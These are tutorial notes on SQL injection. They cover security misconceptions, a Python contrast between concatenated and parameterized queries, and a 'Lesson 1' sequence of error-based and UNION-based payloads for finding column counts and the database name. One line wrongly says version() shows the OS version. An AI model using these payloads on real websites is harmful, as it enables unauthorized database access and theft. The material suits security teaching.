What is SQL injection?

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

Security misconception

1) The firewall protects my web server and database.

Access to the server through ports 80 and 443 makes the web server part of your external perimeter defense.

Vulnerabilities in the web server software or applications may allow access to internal network resources.

2) The IDS protects my web server and database

The IDS is configured to detect signatures of various well-known attacks.

Attack signatures do not include those for attacks against custom applications.

3) SSL secures my sites

SSL secures the transport of data between the web server and the user's browser.

SSL does not protect against the attacks against the server and applications.

SSL is the hacker's best friend due to the false sense of security it gives.

1) Attacker sends data containing an SQL fragment

2) Application sends the modified query to the database

3) Attacker views unauthorized data

SQL injection cannot be prevented by a firewall, an IDS or SSL. You need to be very precise when you write your code: mistakes in the code are responsible for SQL injection.

It is a flaw in "web application" development, it is not a DB or web server problem.

Most programmers are still not aware of this problem.

A lot of the tutorials & demo "templates" are vulnerable.

Even worse, a lot of solutions posted on the Internet are not good enough.

In our pen test over 60% of our clients turn out to be vulnerable to SQL injection.
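As an added example (not code from the original notes), the string-concatenated lookup that the lessons below exploit, shown beside the parameterized form that fixes it, in Python with sqlite3; the users table and its rows are constructed for the demo:

```python
import logging
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the page's
    # "select uname, password from table where id = ..." example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, uname TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "hash-a"), (2, "bob", "hash-b"), (3, "carol", "hash-c")],
    )
    return conn


def lookup_vulnerable(conn, user_input):
    # Concatenation: the input becomes part of the SQL text, so a quote in it
    # closes the literal and whatever follows is parsed as SQL (the ' -- trick).
    # A lone stray quote leaves the literal unterminated and raises a DB error,
    # which is exactly the signal Lesson 1 describes.
    sql = "SELECT uname, password FROM users WHERE id = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_input):
    # Placeholder: the driver passes the value separately from the SQL text,
    # so quotes, comment markers and keywords are just characters in a string
    # that is compared against the id column and matches nothing.
    sql = "SELECT uname, password FROM users WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def handle_request(conn, user_input):
    # Defence in depth: even with placeholders, never echo raw database errors
    # to the client; log them internally and return a generic message.
    try:
        return lookup_safe(conn, user_input)
    except sqlite3.Error as exc:
        logging.error("database error while handling request: %s", exc)
        return "request failed"


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1' --"))   # quote and comment alter the query
    print(lookup_safe(db, "1' --"))         # whole string is just a value: []
```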

Lesson 1 Notes - Error-Based Injection (and why database errors are bad)

select uname, password from table where id = 'our-input'

select uname, password from table where id = '1'

The above will produce an error directly from the database instead of a 404 page not found, which means you are already connected to the database and can dump it!

' and \ will break the current query and make the database execute your line of code, getting the database to do something it wasn't designed to do.

Our input will be joined to the part of the query that we cannot modify. To join the query, do:

' -- [space] will work, but if it doesn't you can URL-encode the space as %20, giving a final result of ' --%20

' --+ will work too

1' order by 1 --+ [up to] 1' order by 3 --+ [the highest number that does not error tells you the number of columns; here the page's example has 3]

' union all select 1,2,3 --+

Only the result of one query can be displayed on the page.

-1' union all select 1,2,3 --+ [This will break the first query at the first 1]

-1' union all select 1,database(),3 --+ [This will show you the name of the database]

-1' union all select 1,database(),version() --+ [This will display the OS version]
